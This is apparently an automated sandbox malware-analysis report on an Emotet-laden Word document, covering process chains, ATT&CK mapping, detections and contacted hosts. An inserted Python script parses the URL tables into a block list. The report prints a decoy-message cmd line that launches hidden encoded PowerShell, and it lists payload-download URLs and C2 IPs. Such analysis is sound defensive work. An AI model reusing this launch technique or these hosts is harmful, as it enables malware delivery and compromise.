                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll,#1
                Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD
                Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
                Source: rundll32.exe, 00000008.00000002.922961365.0000000003360000.00000002.00000001.sdmp | Binary or memory string: Program Manager
                Source: rundll32.exe, 00000008.00000002.922961365.0000000003360000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
                Source: rundll32.exe, 00000008.00000002.922961365.0000000003360000.00000002.00000001.sdmp | Binary or memory string: Progman
                Source: rundll32.exe, 00000008.00000002.922961365.0000000003360000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoA,
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,GetLocaleInfoA,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoA,
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP,
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\rundll32.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_1000E372 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
                Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information:

                Yara detected Emotet
                Source: Yara match | File source: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.922478242.0000000000F20000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.689861945.0000000001070000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.689878857.0000000001091000.00000020.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 8.2.rundll32.exe.f20000.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 8.2.rundll32.exe.f40000.2.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.2.rundll32.exe.1090000.2.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.2.rundll32.exe.1070000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.2.rundll32.exe.1070000.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 8.2.rundll32.exe.f20000.1.raw.unpack, type: UNPACKEDPE

                MITRE ATT&CK Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsWindows Management Instrumentation11Path InterceptionProcess Injection112Disable or Modify Tools1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsScripting12Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDeobfuscate/Decode Files or Information21LSASS MemoryFile and Directory Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothEncrypted Channel22Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsNative API2Logon Script (Windows)Logon Script (Windows)Scripting12Security Account ManagerSystem Information Discovery26SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsExploitation for Client Execution3Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSQuery Registry1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCommand and Scripting Interpreter11Network Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsSecurity Software Discovery131SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol13Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaPowerShell4Rc.commonRc.commonMasquerading21Cached Domain CredentialsVirtualization/Sandbox Evasion3VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion3DCSyncProcess Discovery3Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection112Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Hidden Files and Directories1/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Rundll321Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                Behavior Graph


                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                Behavior Graph ID: 347028, Sample: v22Pc0qA.doc.doc, Startdate: 01/02/2021, Architecture: WINDOWS, Score: 100
                • Start node: Multi AV Scanner detection for domain / URL; Antivirus detection for URL or domain; Multi AV Scanner detection for dropped file; 11 other signatures. Processes started: cmd.exe, WINWORD.EXE, svchost.exe, 2 other processes
                • cmd.exe: Suspicious powershell command line found; Very long command line found; Encrypted powershell cmdline option found; PowerShell case anomaly found. Processes started: powershell.exe, conhost.exe, msg.exe
                • powershell.exe: isatechnology.com 35.208.182.43, 443, 49744 GOOGLE-2US United States; www.isatechnology.com; 2 other IPs or domains. Dropped: C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll, PE32. Signature: Powershell drops PE file. Process started: rundll32.exe
                • rundll32.exe: process started: rundll32.exe
                • rundll32.exe: Hides that the sample has been downloaded from the Internet (zone.identifier). Process started: rundll32.exe
                • rundll32.exe: 50.116.111.59, 49773, 8080 UNIFIEDLAYER-AS-1US United States; 173.249.20.233, 443, 49775 CONTABODE Germany; 2 other IPs or domains. Signature: System process connects to network (likely due to code injection or exploit)


                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                Source | Detection | Scanner | Label
                v22Pc0qA.doc.doc | 73% | Virustotal |
                v22Pc0qA.doc.doc | 47% | Metadefender |
                v22Pc0qA.doc.doc | 86% | ReversingLabs | Script-Macro.Trojan.Valyria

                Dropped Files

                Source | Detection | Scanner | Label
                C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll | 100% | Joe Sandbox ML |
                C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll | 56% | Metadefender |
                C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll | 96% | ReversingLabs | Win32.Trojan.Emotet

                Unpacked PE Files

                Source | Detection | Scanner | Label
                6.2.rundll32.exe.1090000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                8.2.rundll32.exe.f40000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

                Domains

                Source | Detection | Scanner | Label
                isatechnology.com | 7% | Virustotal |

URLs

Source | Detection | Scanner | Label
http://isatechnology.com | 0% | Avira URL Cloud | safe
https://physio-svdh.ch/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.3 | 0% | Avira URL Cloud | safe
https://physio-svdh.ch/angebot/physiotherapie/ | 0% | Avira URL Cloud | safe
https://www.isatechnology.com/training/b/ | 100% | Avira URL Cloud | malware
https://cdn.entity. | 0% | URL Reputation | safe
https://physio-svdh.ch/wp-content/themes/econature/gutenberg/css/frontend-style.css?ver=1.0.0 | 0% | Avira URL Cloud | safe
https://rpsticket.partnerservices.getmicrosoftkey.com | 0% | URL Reputation | safe
http://transfersuvan.com/wp-admin/OVl/ | 100% | Avira URL Cloud | malware
https://physio-svdh.ch/wp-content/themes/econature/js/jquer0 | 0% | Avira URL Cloud | safe
https://api.aadrm.com/ | 0% | URL Reputation | safe
https://physio-svdh.ch/angebot/hausbesuche/ | 0% | Avira URL Cloud | safe
https://physio-svdh.ch/wp-content/themes/econature/js/scrollspy.js?ver=1.0.0 | 0% | Avira URL Cloud | safe
http://cps.root-x1.letsencrypt. | 0% | Avira URL Cloud | safe
https://physio-svdh.ch/kontakt/ | 0% | Avira URL Cloud | safe
https://physio-svdh.ch/wp-content/themes/econature/css/animate.css?ver=1.0.0 | 0% | Avira URL Cloud | safe
https://physio-svdh.ch/wp-includes/js/wp-embed.min.js?ver=5.5.3 | 0% | Avira URL Cloud | safe
https://res.getmicrosoftkey.com/api/redemptionevents | 0% | URL Reputation | safe
https://officeci.azurewebsites.net/api/ | 0% | Avira URL Cloud | safe
https://store.office.cn/addinstemplate | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
http://cps.letsencrypt.org0 | 0% | URL Reputation | safe
https://wus2-000.pagecontentsync. | 0% | URL Reputation | safe
https://physio-svdh.ch/wp-content/plugins/buttonizer-multifunctional-button/assets/frontend.css?v=7c | 0% | Avira URL Cloud | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://physio-svdh.ch/ | 0% | Avira URL Cloud | safe
https://www.odwebp.svc.ms | 0% | URL Reputation | safe
https://physio-svdh.ch/wp-content/themes/econature/css/fontello.css?ver=1.0.0 | 0% | Avira URL Cloud | safe
https://physio-svdh.ch/wp-content/themes/econature/css/retina.css?ver=1.0.0 | 0% | Avira URL Cloud | safe
https://physio-svdh.ch/wp-content/uploads/cmsms_styles/econature.css?ver=1.0.0 | 0% | Avira URL Cloud | safe
https://physio-svdh.ch | 0% | Avira URL Cloud | safe
https://physio-svdh.ch/ueber-uns/about-us/ | 0% | Avira URL Cloud | safe
http://arquivopop.com.br/index_htm_files/Kxh/ | 100% | Avira URL Cloud | malware
https://physio-svdh.ch/wp-content/themes/econature/css/ie.css?ver=1.0.0 | 0% | Avira URL Cloud | safe
https://physio-svdh.ch/offene-stellen/ | 0% | Avira URL Cloud | safe
https://physio-svdh.ch/angebot/training-fuer-senioren/ | 0% | Avira URL Cloud | safe
https://physio-svdh.ch/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp | 0% | Avira URL Cloud | safe
https://physio-svdh.ch/angebot/med-trainingstherapie-mtt/ | 0% | Avira URL Cloud | safe
https://physio-svdh.ch/wp-includes/wlwmanifest.xml | 0% | Avira URL Cloud | safe
https://cairocad.com/cgi-bin/1PBB/ | 100% | Avira URL Cloud | malware
https://www.isatechnology.comArAC | 0% | Avira URL Cloud | safe
https://physio-svdh.ch/wp-content/plugins/LayerSlider/static/layerslider/js/layerslider.kreaturamedi | 0% | Avira URL Cloud | safe
https://physio-svdh.ch/xmlrpc.php | 0% | Avira URL Cloud | safe
http://ownitconsignment.com/files/b/ | 100% | Avira URL Cloud | malware
https://physio-svdh.ch/wp-content/plugins/LayerSlider/static/layerslider/js/greensock.js?ver=1.19.0 | 0% | Avira URL Cloud | safe
https://physio-svdh.ch/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js? | 0% | Avira URL Cloud | safe
https://physio-svdh.ch/wp-content/themes/econature/css/style.css?ver=1.0.0 | 0% | Avira URL Cloud | safe
https://physio-svdh.ch/comments/feed/ | 0% | Avira URL Cloud | safe
https://skyapi.live.net/Activity/ | 0% | URL Reputation | safe
https://physio-svdh.ch/wp-content/plugins/buttonizer-multifunctional-button/assets/frontend.min.js?v | 0% | Avira URL Cloud | safe
https://api.cortana.ai | 0% | URL Reputation | safe
https://physio-svdh.ch/wp-content/themes/econature/css/ilightbox-skins/dark-skin.css?ver=2.2.0 | 0% | Avira URL Cloud | safe
https://staging.cortana.ai | 0% | URL Reputation | safe
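Once these tables are flattened to one string per row, a verdict row is ambiguous on its own: a URL that ends in digits (`…scripts.js?ver=5.3` followed by `0%`) cannot be split from its detection percentage without knowing the URL, and each `URL Reputation` verdict appears as three identical rows. The Python script below is an added example, not code from the Joe Sandbox report; it parses both URL tables in their flattened form (a handful of rows from this report are embedded as constructed input), uses the URL list recovered from the memory table to split the verdict rows unambiguously, drops the repeated rows, and derives a block list of the URLs the report flags. The regular expressions and function names are this example's own assumptions about the row layout.

```python
"""Parse flattened Joe Sandbox URL verdict tables into structured IOC rows.

Added example, not code from the Joe Sandbox report. The row strings below are
copied from this report; the regexes and function names are this example's own.
"""
import re
from dataclasses import dataclass

# Constructed input: rows copied from the report's "URLs from Memory and Binaries" table.
MEMORY_ROWS = [
    "https://shell.suite.office.com:1443DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse",
    "http://isatechnology.compowershell.exe, 00000004.00000002.697418447.00000271148FC000.00000004.00000001.sdmptrue",
    "https://corp.roblox.com/contact/svchost.exe, 0000000F.00000003.749469958.000002796435B000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.749374070.00000279643ED000.00000004.00000001.sdmpfalse",
    "https://physio-svdh.ch/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.3powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse",
    "https://www.isatechnology.com/training/b/powershell.exe, 00000004.00000002.694935802.00000271141E5000.00000004.00000001.sdmptrue",
    "http://transfersuvan.com/wp-admin/OVl/powershell.exe, 00000004.00000002.694935802.00000271141E5000.00000004.00000001.sdmptrue",
    "http://cps.letsencrypt.org0powershell.exe, 00000004.00000003.687729373.000002712B84E000.00000004.00000001.sdmpfalse",
    "https://cdn.entity.DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse",
]
# Constructed input: the matching rows from the report's "URLs" verdict table, repeats included.
VERDICT_ROWS = [
    "http://isatechnology.com0%Avira URL Cloudsafe",
    "https://physio-svdh.ch/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.30%Avira URL Cloudsafe",
    "https://www.isatechnology.com/training/b/100%Avira URL Cloudmalware",
    "https://cdn.entity.0%URL Reputationsafe",
    "https://cdn.entity.0%URL Reputationsafe",
    "https://cdn.entity.0%URL Reputationsafe",
    "http://transfersuvan.com/wp-admin/OVl/100%Avira URL Cloudmalware",
    "http://cps.letsencrypt.org00%URL Reputationsafe",
]

# A memory hit is attributed to one or more process memory dumps
# ("<process>.exe, <dump id>.sdmp") or to a dropped file named by GUID (".0.dr").
DUMP = r"(?:powershell|svchost|rundll32)\.exe, \S+?\.sdmp"
GUID_DR = r"[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}\.0\.dr"
MEMORY_RE = re.compile(
    rf"^(?P<url>.+?)(?P<source>(?:{DUMP}(?:, )?)+|{GUID_DR})(?P<malicious>true|false)$"
)
# Tail of a verdict row once the URL has been removed: "<n>%<scanner><label>".
VERDICT_TAIL_RE = re.compile(
    r"^(?P<detection>\d{1,3})%(?P<scanner>Avira URL Cloud|URL Reputation|Virustotal)"
    r"(?P<label>safe|malware)$"
)


@dataclass(frozen=True)
class Verdict:
    url: str
    detection: int  # percent of engines flagging the URL
    scanner: str
    label: str


def parse_memory_rows(rows):
    """Map URL -> (source, malicious) for the memory/binary table."""
    parsed = {}
    for row in rows:
        m = MEMORY_RE.match(row)
        if m is None:
            raise ValueError(f"unparsed memory row: {row!r}")
        parsed[m["url"]] = (m["source"], m["malicious"] == "true")
    return parsed


def parse_verdict_rows(rows, known_urls):
    """Split verdict rows using the known URL list; return (verdicts, unresolved rows).

    The split is only safe when the URL is known: "...?ver=5.30%" is 5.3 + 0%, not 5. + 30%.
    Longest known URL is tried first so "https://physio-svdh.ch/" wins over "https://physio-svdh.ch".
    Rows with no known URL prefix are returned unresolved rather than guessed.
    """
    verdicts, unresolved, seen = [], [], set()
    candidates = sorted(known_urls, key=len, reverse=True)
    for row in rows:
        if row in seen:  # the report repeats URL Reputation rows verbatim
            continue
        seen.add(row)
        for url in candidates:
            if row.startswith(url):
                tail = VERDICT_TAIL_RE.match(row[len(url):])
                if tail:
                    verdicts.append(Verdict(url, int(tail["detection"]), tail["scanner"], tail["label"]))
                    break
        else:
            unresolved.append(row)
    return verdicts, unresolved


def block_list(memory, verdicts):
    """URLs the report flags: marked malicious in memory, or labelled malware by a URL scanner."""
    flagged = {v.url for v in verdicts if v.label == "malware"}
    flagged |= {url for url, (_, malicious) in memory.items() if malicious}
    return sorted(flagged)


if __name__ == "__main__":
    memory = parse_memory_rows(MEMORY_ROWS)
    verdicts, unresolved = parse_verdict_rows(VERDICT_ROWS, memory)
    for v in verdicts:
        print(f"{v.detection:3d}% {v.scanner:<16} {v.label:<8} {v.url}")
    print("unresolved:", unresolved)
    print("block:", *block_list(memory, verdicts), sep="\n  ")
```

Run it with `python3`; the block list it prints is the union of the memory-table `Malicious: true` URLs and the scanner `malware` verdicts, which for the embedded rows is the bare `isatechnology.com` domain plus the two payload URLs. Note that `http://isatechnology.com` is flagged malicious in memory even though Avira URL Cloud rates it safe, so a block list built from scanner labels alone would miss it.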

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
isatechnology.com | 35.208.182.43 | true | true | - | unknown
physio-svdh.ch | 194.209.195.106 | true | false | - | unknown
www.isatechnology.com | unknown | unknown | true | - | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://shell.suite.office.com:1443 | DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | false | - | high
https://autodiscover-s.outlook.com/ | DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | false | - | high
http://isatechnology.com | powershell.exe, 00000004.00000002.697418447.00000271148FC000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
https://corp.roblox.com/contact/ | svchost.exe, 0000000F.00000003.749469958.000002796435B000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.749374070.00000279643ED000.00000004.00000001.sdmp | false | - | high
https://physio-svdh.ch/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.3 | powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr | DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | false | - | high
https://physio-svdh.ch/angebot/physiotherapie/ | powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://www.isatechnology.com/training/b/ | powershell.exe, 00000004.00000002.694935802.00000271141E5000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
https://cdn.entity. | DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | false | URL Reputation: safe | unknown
https://physio-svdh.ch/wp-content/themes/econature/gutenberg/css/frontend-style.css?ver=1.0.0 | powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/ | DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | false | - | high
https://rpsticket.partnerservices.getmicrosoftkey.com | DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | false | URL Reputation: safe | unknown
https://lookup.onenote.com/lookup/geolocation/v1 | DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | false | - | high
http://transfersuvan.com/wp-admin/OVl/ | powershell.exe, 00000004.00000002.694935802.00000271141E5000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
https://physio-svdh.ch/wp-content/themes/econature/js/jquer0 | powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile | DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | false | - | high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy | DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | false | - | high
https://api.aadrm.com/ | DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | false | URL Reputation: safe | unknown
https://physio-svdh.ch/angebot/hausbesuche/ | powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://physio-svdh.ch/wp-content/themes/econature/js/scrollspy.js?ver=1.0.0 | powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://cps.root-x1.letsencrypt. | powershell.exe, 00000004.00000003.687729373.000002712B84E000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://use.fontawesome.com/releases/v5.8.2/css/all.css?ver=5.5.3 | powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | false | - | high
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies | DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | false | - | high
https://api.microsoftstream.com/api/ | DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | false | - | high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive | DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | false | - | high
https://cr.office.com | DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | false | - | high
https://nuget.org/nuget.exe | powershell.exe, 00000004.00000002.699571574.0000027123779000.00000004.00000001.sdmp | false | - | high
https://physio-svdh.ch/kontakt/ | powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://physio-svdh.ch/wp-content/themes/econature/css/animate.css?ver=1.0.0 | powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://physio-svdh.ch/wp-includes/js/wp-embed.min.js?ver=5.5.3 | powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000004.00000002.689707383.00000271135D1000.00000004.00000001.sdmp | false | - | high
https://res.getmicrosoftkey.com/api/redemptionevents | DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | false | URL Reputation: safe | unknown
https://tasks.office.com | DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | false | - | high
https://officeci.azurewebsites.net/api/ | DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | false | Avira URL Cloud: safe | unknown
https://www.hulu.com/do-not-sell-my-info | svchost.exe, 0000000F.00000003.740940111.00000279643C9000.00000004.00000001.sdmp | false | - | high
https://store.office.cn/addinstemplate | DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | false | URL Reputation: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000004.00000002.690538281.00000271137E5000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://cps.letsencrypt.org0 | powershell.exe, 00000004.00000003.687729373.000002712B84E000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://wus2-000.pagecontentsync. | DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000004.00000002.690538281.00000271137E5000.00000004.00000001.sdmp | false | - | high
